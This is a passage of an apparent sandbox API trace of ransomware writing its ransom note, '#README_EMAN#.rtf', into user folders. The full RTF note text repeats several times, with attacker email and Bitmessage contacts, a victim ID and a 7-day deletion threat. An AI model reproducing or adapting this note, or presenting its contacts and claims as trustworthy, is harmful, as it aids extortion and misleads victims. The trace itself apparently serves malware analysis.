m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.305] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.305] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.306] CloseHandle (hObject=0x294) returned 1 [0285.306] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\#readme_eman#.rtf")) returned 0xffffffff [0285.306] GetLastError () returned 0x2 [0285.306] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.307] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 